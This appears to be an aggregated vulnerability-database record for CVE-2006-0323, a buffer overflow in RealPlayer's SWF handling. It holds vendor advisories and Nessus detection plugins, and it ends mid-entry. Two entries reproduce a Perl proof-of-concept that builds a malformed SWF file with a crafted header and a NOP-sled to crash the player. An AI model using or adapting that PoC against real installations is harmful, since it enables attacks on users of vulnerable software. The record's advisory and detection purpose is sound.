Buffer overflow in swfformat.dll in multiple RealNetworks products and versions including RealPlayer 10.x, RealOne Player, Rhapsody 3, and Helix Player allows remote attackers to execute arbitrary code via a crafted SWF (Flash) file with (1) a size value that is less than the actual size, or (2) other unspecified manipulations.
{"exploitpack": [{"lastseen": "2020-04-01T19:04:45", "description": "\nRealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "exploitpack", "title": "RealNetworks (Multiple Products) - Multiple Buffer Overflow Vulnerabilities", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-23T00:00:00", "id": "EXPLOITPACK:2B9A593CB682A18F23FA908F3143E367", "href": "", "sourceData": "source: https://www.securityfocus.com/bid/17202/info\n\nVarious RealNetworks products are prone to multiple buffer-overflow vulnerabilities.\n\nThese issues can result in memory corruption and facilitate arbitrary code execution. A successful attack can allow remote attackers to execute arbitrary code in the context of the application to gain unauthorized access.\n\n#!/usr/bin/perl\n###################################################\n# RealPlayer: Buffer overflow vulnerability / PoC\n#\n# CVE-2006-0323\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\n#\n# RealNetworks Advisory\n# http://service.real.com/realplayer/security/03162006_player/en/\n#\n# Federico L. Bossi Bonin \n# fbossi[at]netcomm.com.ar\n###################################################\n\n# Program received signal SIGSEGV, Segmentation fault.\n# [Switching to Thread -1218976064 (LWP 21932)]\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\n\nmy $EGGFILE=\"egg.swf\";\nmy $header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\";\n\nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\".\n\t \"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\".\n\t \"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\".\n \"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\".\n\t \"\\x00\\x00\\x00\";\n\n\nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\";\nprint EGG $header;\n\nfor ($i = 0; $i < 135; $i++) {\n$buffer.= \"\\x90\";\n}\n\nprint EGG $buffer;\nprint EGG $endheader;\nclose(EGG);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:45", "description": "\nRealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)", "cvss3": {}, "published": "2006-03-28T00:00:00", "type": "exploitpack", "title": "RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-28T00:00:00", "id": "EXPLOITPACK:13F7868B04FD8DDB92761B19FD8AB565", "href": "", "sourceData": "#!/usr/bin/perl\n###################################################\n# RealPlayer: Buffer overflow vulnerability / PoC\n#\n# CVE-2006-0323\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\n#\n# RealNetworks Advisory\n# http://service.real.com/realplayer/security/03162006_player/en/\n#\n# Federico L. Bossi Bonin \n# fbossi[at]netcomm.com.ar\n###################################################\n\n# Program received signal SIGSEGV, Segmentation fault.\n# [Switching to Thread -1218976064 (LWP 21932)]\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\n\nmy $EGGFILE=\"egg.swf\";\nmy $header=\"\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60\";\n\nmy $endheader=\"\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01\".\n\t \"\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02\".\n\t \"\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00\".\n \"\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40\".\n\t \"\\x00\\x00\\x00\";\n\n\nopen(EGG, \">$EGGFILE\") or die \"ERROR:$EGGFILE\\n\";\nprint EGG $header;\n\nfor ($i = 0; $i < 135; $i++) {\n$buffer.= \"\\x90\";\n}\n\nprint EGG $buffer;\nprint EGG $endheader;\nclose(EGG);\n\n# milw0rm.com [2006-03-28]", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-21T04:43:00", "description": "RealPlayer is a media player that provides media playback locally and via\r\nstreaming.\r\n\r\nA buffer overflow bug was discovered in the way RealPlayer processes Flash\r\nMedia (.swf) files. It is possible for a malformed Flash Media file to\r\nexecute arbitrary code as the user running RealPlayer. The Common\r\nVulnerabilities and Exposures project assigned the name CVE-2006-0323 to\r\nthis issue.\r\n\r\nAll users of RealPlayer are advised to upgrade to this updated package,\r\nwhich contains RealPlayer version 10.0.7 and is not vulnerable to this issue.", "cvss3": {}, "published": "2006-03-22T00:00:00", "type": "redhat", "title": "(RHSA-2006:0257) RealPlayer security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2018-05-26T00:26:19", "id": "RHSA-2006:0257", "href": "https://access.redhat.com/errata/RHSA-2006:0257", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-12-06T16:06:53", "description": "### Background\n\nRealPlayer is a multimedia player capable of handling multiple multimedia file formats. \n\n### Description\n\nRealPlayer is vulnerable to a buffer overflow when processing malicious SWF files. \n\n### Impact\n\nBy enticing a user to open a specially crafted SWF file an attacker could execute arbitrary code with the permissions of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll RealPlayer users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-video/realplayer-10.0.7\"", "cvss3": {}, "published": "2006-03-26T00:00:00", "type": "gentoo", "title": "RealPlayer: Buffer overflow vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-26T00:00:00", "id": "GLSA-200603-24", "href": "https://security.gentoo.org/glsa/200603-24", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-12-07T14:37:24", "description": "The remote host is affected by the vulnerability described in GLSA-200603-24 (RealPlayer: Buffer overflow vulnerability)\n\n RealPlayer is vulnerable to a buffer overflow when processing malicious SWF files.\n Impact :\n\n By enticing a user to open a specially crafted SWF file an attacker could execute arbitrary code with the permissions of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2006-03-27T00:00:00", "type": "nessus", "title": "GLSA-200603-24 : RealPlayer: Buffer overflow vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:realplayer", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200603-24.NASL", "href": "https://www.tenable.com/plugins/nessus/21148", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200603-24.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21148);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-0323\");\n script_xref(name:\"GLSA\", value:\"200603-24\");\n\n script_name(english:\"GLSA-200603-24 : RealPlayer: Buffer overflow vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200603-24\n(RealPlayer: Buffer overflow vulnerability)\n\n RealPlayer is vulnerable to a buffer overflow when processing\n malicious SWF files.\n \nImpact :\n\n By enticing a user to open a specially crafted SWF file an\n attacker could execute arbitrary code with the permissions of the user\n running the application.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://service.real.com/realplayer/security/03162006_player/en/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.real.com/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200603-24\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All RealPlayer users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-video/realplayer-10.0.7'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/03/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-video/realplayer\", unaffected:make_list(\"ge 10.0.7\"), vulnerable:make_list(\"lt 10.0.7\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"RealPlayer\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T14:38:41", "description": "Secunia Advisories Reports :\n\nA boundary error when processing SWF files can be exploited to cause a buffer overflow. This may allow execution of arbitrary code on the user's system.", "cvss3": {}, "published": "2006-05-13T00:00:00", "type": "nessus", "title": "FreeBSD : linux-realplayer -- buffer overrun (25858c37-bdab-11da-b7d4-00123ffe8333)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-realplayer"], "id": "FREEBSD_PKG_25858C37BDAB11DAB7D400123FFE8333.NASL", "href": "https://www.tenable.com/plugins/nessus/21402", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21402);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-0323\");\n script_xref(name:\"Secunia\", value:\"19358\");\n\n script_name(english:\"FreeBSD : linux-realplayer -- buffer overrun (25858c37-bdab-11da-b7d4-00123ffe8333)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Secunia Advisories Reports :\n\nA boundary error when processing SWF files can be exploited to cause a\nbuffer overflow. This may allow execution of arbitrary code on the\nuser's system.\"\n );\n # http://service.real.com/realplayer/security/03162006_player/en/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.real.com/\"\n );\n # https://vuxml.freebsd.org/freebsd/25858c37-bdab-11da-b7d4-00123ffe8333.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8e3534bb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/05/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-realplayer>=10.0.1<10.0.7.785.20060201\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T16:20:11", "description": "An updated RealPlayer package that fixes a buffer overflow bug is now available for Red Hat Enterprise Linux Extras 3 and 4.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nRealPlayer is a media player that provides media playback locally and via streaming.\n\nA buffer overflow bug was discovered in the way RealPlayer processes Flash Media (.swf) files. It is possible for a malformed Flash Media file to execute arbitrary code as the user running RealPlayer. The Common Vulnerabilities and Exposures project assigned the name CVE-2006-0323 to this issue.\n\nAll users of RealPlayer are advised to upgrade to this updated package, which contains RealPlayer version 10.0.7 and is not vulnerable to this issue.", "cvss3": {}, "published": "2013-01-24T00:00:00", "type": "nessus", "title": "RHEL 3 / 4 : RealPlayer (RHSA-2006:0257)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:realplayer", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2006-0257.NASL", "href": "https://www.tenable.com/plugins/nessus/63831", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0257. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63831);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-0323\");\n script_xref(name:\"RHSA\", value:\"2006:0257\");\n\n script_name(english:\"RHEL 3 / 4 : RealPlayer (RHSA-2006:0257)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated RealPlayer package that fixes a buffer overflow bug is now\navailable for Red Hat Enterprise Linux Extras 3 and 4.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nRealPlayer is a media player that provides media playback locally and\nvia streaming.\n\nA buffer overflow bug was discovered in the way RealPlayer processes\nFlash Media (.swf) files. It is possible for a malformed Flash Media\nfile to execute arbitrary code as the user running RealPlayer. The\nCommon Vulnerabilities and Exposures project assigned the name\nCVE-2006-0323 to this issue.\n\nAll users of RealPlayer are advised to upgrade to this updated\npackage, which contains RealPlayer version 10.0.7 and is not\nvulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2006-0323.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2006-0257.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected RealPlayer and / or realplayer packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:RealPlayer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:realplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"realplayer-10.0.7-0.rhel3.2\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"RealPlayer-10.0.7-2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T14:37:14", "description": "According to its version number, the installed version of Rhapsody on the remote host suffers from a buffer overflow involving SWF files. To exploit this issue, a remote attacker needs to convince a user to attempt to play a maliciously crafted SWF file using the affected application.", "cvss3": {}, "published": "2006-03-24T00:00:00", "type": "nessus", "title": "Rhapsody SWF File Handling Buffer Overflow", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2018-08-22T00:00:00", "cpe": [], "id": "RHAPSODY_3_1_0_270.NASL", "href": "https://www.tenable.com/plugins/nessus/21141", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21141);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2006-0323\");\n script_bugtraq_id(17202);\n\n script_name(english:\"Rhapsody SWF File Handling Buffer Overflow\");\n script_summary(english:\"Checks version of Rhapsody\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows application is affected by a buffer overflow flaw.\" );\n script_set_attribute(attribute:\"description\", value:\n\"According to its version number, the installed version of Rhapsody on\nthe remote host suffers from a buffer overflow involving SWF files. \nTo exploit this issue, a remote attacker needs to convince a user to\nattempt to play a maliciously crafted SWF file using the affected\napplication.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://service.real.com/realplayer/security/03162006_player/en/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Rhapsody 3 build 1.0.270 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/03/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/03/22\");\n script_cvs_date(\"Date: 2018/08/22 16:49:14\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencie(\"rhapsody_detect.nasl\");\n script_require_keys(\"SMB/Rhapsody/Version\");\n\n exit(0);\n}\n\n\n# Check version of Rhapsody.\nver = get_kb_item(\"SMB/Rhapsody/Version\");\nif (!ver) exit(0);\n\n# There's a problem if it's version [3.0.0.815, 3.1.0.270).\niver = split(ver, sep:'.', keep:FALSE);\nif (\n int(iver[0]) == 3 &&\n (\n (int(iver[1]) == 0 && int(iver[2]) == 0 && int(iver[3]) >= 815) ||\n (int(iver[1]) == 1 && int(iver[2]) == 0 && int(iver[3]) < 270)\n )\n) security_hole(get_kb_item(\"SMB/transport\"));\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T14:37:25", "description": "The remote host is missing the patch for the advisory SUSE-SA:2006:018 (RealPlayer).\n\n\nThis update fixes the following security problems in Realplayer:\n\n- Specially crafted SWF files could cause a buffer overflow and crash RealPlayer (CVE-2006-0323).\n\n- Specially crafted web sites could cause heap overflow and lead to executing arbitrary code (CVE-2005-2922). This was already fixed with the previously released 1.0.6 version, but not announced on request of Real.\n\nThe advisory for these problems is on this page at Real:\nhttp://service.real.com/realplayer/security/03162006_player/en/\n\nSUSE Linux 9.2 up to 10.0 and Novell Linux Desktop 9 are affected by this problem and receive fixed packages.\n\nIf you are still using Realplayer on SUSE Linux 9.1 or SUSE Linux Desktop 1, we again wish to remind you that the Real player on these products cannot be updated and recommend to deinstall it.", "cvss3": {}, "published": "2006-03-27T00:00:00", "type": "nessus", "title": "SUSE-SA:2006:018: RealPlayer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2922", "CVE-2006-0323"], "modified": "2021-01-14T00:00:00", "cpe": [], "id": "SUSE_SA_2006_018.NASL", "href": "https://www.tenable.com/plugins/nessus/21150", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2006:018\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(21150);\n script_version(\"1.9\");\n \n name[\"english\"] = \"SUSE-SA:2006:018: RealPlayer\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2006:018 (RealPlayer).\n\n\nThis update fixes the following security problems in Realplayer:\n\n- Specially crafted SWF files could cause a buffer overflow and\ncrash RealPlayer (CVE-2006-0323).\n\n- Specially crafted web sites could cause heap overflow and lead to\nexecuting arbitrary code (CVE-2005-2922). This was already fixed\nwith the previously released 1.0.6 version, but not announced on\nrequest of Real.\n\nThe advisory for these problems is on this page at Real:\nhttp://service.real.com/realplayer/security/03162006_player/en/\n\nSUSE Linux 9.2 up to 10.0 and Novell Linux Desktop 9 are affected by\nthis problem and receive fixed packages.\n\nIf you are still using Realplayer on SUSE Linux 9.1 or SUSE Linux\nDesktop 1, we again wish to 